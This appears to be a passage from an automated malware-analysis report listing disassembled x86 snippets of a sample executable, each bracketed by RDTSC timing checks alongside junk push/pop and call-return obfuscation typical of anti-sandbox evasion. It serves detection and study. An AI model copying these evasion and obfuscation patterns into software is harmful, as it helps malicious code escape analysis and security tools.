Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6BEE40 second address: 6BEE53 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F3B34E245F6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6BEE53 second address: 6BEE59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6BF933 second address: 6BF937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C3AA9 second address: 6C3B40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F672h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F3B34C1F668h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 sub dword ptr [ebp+12457C08h], edx 0x0000002d push 00000000h 0x0000002f sub bh, 00000030h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F3B34C1F668h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e pushad 0x0000004f jmp 00007F3B34C1F674h 0x00000054 jmp 00007F3B34C1F66Fh 0x00000059 popad 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d push ebx 0x0000005e push edi 0x0000005f pop edi 0x00000060 pop ebx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C5C39 second address: 6C5C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C5D90 second address: 6C5E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F3B34C1F668h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D3093h], ecx 0x00000029 mov dword ptr [ebp+12473270h], edi 0x0000002f push dword ptr fs:[00000000h] 0x00000036 mov bx, ax 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 jmp 00007F3B34C1F672h 0x00000045 mov eax, dword ptr [ebp+122D0DE9h] 0x0000004b push FFFFFFFFh 0x0000004d je 00007F3B34C1F66Ch 0x00000053 mov edi, dword ptr [ebp+122D3C4Ah] 0x00000059 nop 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C5E06 second address: 6C5E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C8B78 second address: 6C8B84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C8B84 second address: 6C8B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C8B88 second address: 6C8C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F3B34C1F668h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 call 00007F3B34C1F66Ah 0x0000002b or edi, 51B85E70h 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F3B34C1F668h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D3922h] 0x00000054 push 00000000h 0x00000056 mov ebx, dword ptr [ebp+122D3B7Eh] 0x0000005c push eax 0x0000005d pushad 0x0000005e pushad 0x0000005f jmp 00007F3B34C1F673h 0x00000064 jmp 00007F3B34C1F66Dh 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F3B34C1F66Bh 0x00000071 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C8C2C second address: 6C8C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C6E53 second address: 6C6E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C6E57 second address: 6C6E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C6E5B second address: 6C6E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C6E65 second address: 6C6E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C6E69 second address: 6C6E89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F676h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C9A5C second address: 6C9A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C9A60 second address: 6C9A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F3B34C1F66Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C8DCB second address: 6C8DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jo 00007F3B34E245F6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C8DDE second address: 6C8E5C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3B34C1F668h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D396Eh] 0x00000013 mov ebx, 19582853h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F3B34C1F668h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 jbe 00007F3B34C1F666h 0x00000046 mov eax, dword ptr [ebp+122D0B1Dh] 0x0000004c push 00000000h 0x0000004e push edi 0x0000004f call 00007F3B34C1F668h 0x00000054 pop edi 0x00000055 mov dword ptr [esp+04h], edi 0x00000059 add dword ptr [esp+04h], 00000014h 0x00000061 inc edi 0x00000062 push edi 0x00000063 ret 0x00000064 pop edi 0x00000065 ret 0x00000066 mov bx, BC37h 0x0000006a push FFFFFFFFh 0x0000006c push eax 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 js 00007F3B34C1F666h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6748AC second address: 6748C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F3B34E245F6h 0x0000000f jno 00007F3B34E245F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C9C4C second address: 6C9C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F3B34C1F66Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6748C1 second address: 6748C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C9C63 second address: 6C9C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6CC1BB second address: 6CC1BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6CE1B2 second address: 6CE22F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F3B34C1F666h 0x00000009 jmp 00007F3B34C1F678h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 je 00007F3B34C1F671h 0x00000018 jmp 00007F3B34C1F66Bh 0x0000001d or dword ptr [ebp+122D1F96h], esi 0x00000023 push 00000000h 0x00000025 and ebx, 14B88DE5h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F3B34C1F668h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D1F96h], esi 0x0000004d xchg eax, esi 0x0000004e jc 00007F3B34C1F66Eh 0x00000054 jg 00007F3B34C1F668h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6CE22F second address: 6CE236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6CE236 second address: 6CE23C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6CE23C second address: 6CE240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6CF1B8 second address: 6CF1C9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3B34C1F666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6CF1C9 second address: 6CF1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3B34E245F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6CF1D4 second address: 6CF1DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F3B34C1F666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6CD37A second address: 6CD396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6CD396 second address: 6CD3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3B34C1F666h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6CC49E second address: 6CC4A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D1111 second address: 6D112B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3B34C1F670h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D112B second address: 6D1190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B34E24603h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F3B34E245F8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 sub edi, dword ptr [ebp+122D2480h] 0x0000002e stc 0x0000002f jo 00007F3B34E24604h 0x00000035 pushad 0x00000036 mov edx, dword ptr [ebp+122D36F2h] 0x0000003c mov dword ptr [ebp+122D30B5h], esi 0x00000042 popad 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 mov dword ptr [ebp+122DBA0Bh], edi 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D1190 second address: 6D1197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D1197 second address: 6D11B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B34E24606h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D11B1 second address: 6D11B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D2407 second address: 6D24C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B34E24609h 0x00000008 jl 00007F3B34E245F6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F3B34E245F8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e mov dword ptr [ebp+1244F789h], ebx 0x00000034 push dword ptr fs:[00000000h] 0x0000003b mov ebx, dword ptr [ebp+122D3982h] 0x00000041 mov edi, ecx 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a call 00007F3B34E245FBh 0x0000004f pop edi 0x00000050 mov eax, dword ptr [ebp+122D0E65h] 0x00000056 call 00007F3B34E24607h 0x0000005b or dword ptr [ebp+122D1E54h], ecx 0x00000061 pop edi 0x00000062 push FFFFFFFFh 0x00000064 pushad 0x00000065 mov eax, 2B3AB452h 0x0000006a pushad 0x0000006b mov dword ptr [ebp+122D2A98h], eax 0x00000071 mov bl, D0h 0x00000073 popad 0x00000074 popad 0x00000075 xor dword ptr [ebp+122D3730h], edx 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e jo 00007F3B34E245F8h 0x00000084 push edx 0x00000085 pop edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D24C3 second address: 6D24C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D24C9 second address: 6D24CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D24CD second address: 6D24ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3B34C1F675h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D9252 second address: 6D928B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24609h 0x00000007 jmp 00007F3B34E245FAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F3B34E24602h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D928B second address: 6D9290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6D9290 second address: 6D9296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6DD667 second address: 6DD673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3B34C1F666h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E1C05 second address: 6E1C0F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3B34E245F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E1E16 second address: 6E1E26 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3B34C1F666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E1E26 second address: 6E1E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jg 00007F3B34E245FEh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F3B34E24609h 0x0000001a jmp 00007F3B34E24603h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E1E5B second address: 6E1E71 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3B34C1F668h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E8F2B second address: 6E8F46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E8F46 second address: 6E8F5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F66Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F3B34C1F666h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E925B second address: 6E9279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24604h 0x00000007 ja 00007F3B34E245F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E93B1 second address: 6E93CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B34C1F676h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E93CB second address: 6E93CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E9576 second address: 6E957A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E9957 second address: 6E9964 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E9964 second address: 6E996A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E996A second address: 6E997E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E245FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6E997E second address: 6E999B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B34C1F679h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F192A second address: 6F1930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F1930 second address: 6F193F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B34C1F66Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F193F second address: 6F1943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F1943 second address: 6F1965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3B34C1F673h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F1965 second address: 6F1969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F1969 second address: 6F1991 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F678h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jg 00007F3B34C1F666h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C0A44 second address: 6C0AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F3B34E245F8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F3B34E245F8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov ecx, dword ptr [ebp+122D39FAh] 0x00000031 lea eax, dword ptr [ebp+1248B818h] 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F3B34E245F8h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 popad 0x0000005a rdtsc
